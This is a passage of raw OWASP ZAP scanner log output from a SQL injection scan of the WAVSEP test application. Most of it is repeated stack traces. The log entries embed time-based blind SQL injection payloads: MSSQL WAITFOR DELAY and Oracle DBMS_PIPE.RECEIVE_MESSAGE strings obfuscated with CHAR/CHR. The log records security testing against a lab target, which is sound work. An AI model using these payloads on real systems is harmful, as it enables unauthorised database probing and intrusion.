CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681693 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681694 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681695 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681695 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681697 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681697 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(69)||CHR(77)||CHR(118),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(69)||CHR(77)||CHR(118),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681698 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(119)||CHR(106)||CHR(83),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(119)||CHR(106)||CHR(83),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681699 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(86)||CHR(69)||CHR(90),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(86)||CHR(69)||CHR(90),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681699 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(118)||CHR(80)||CHR(99),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(118)||CHR(80)||CHR(99),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681700 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(82)||CHR(113)||CHR(65),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(82)||CHR(113)||CHR(65),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681700 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(109)||CHR(65)||CHR(115),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(109)||CHR(65)||CHR(115),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681702 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(103)||CHR(114)||CHR(65),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(103)||CHR(114)||CHR(65),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at 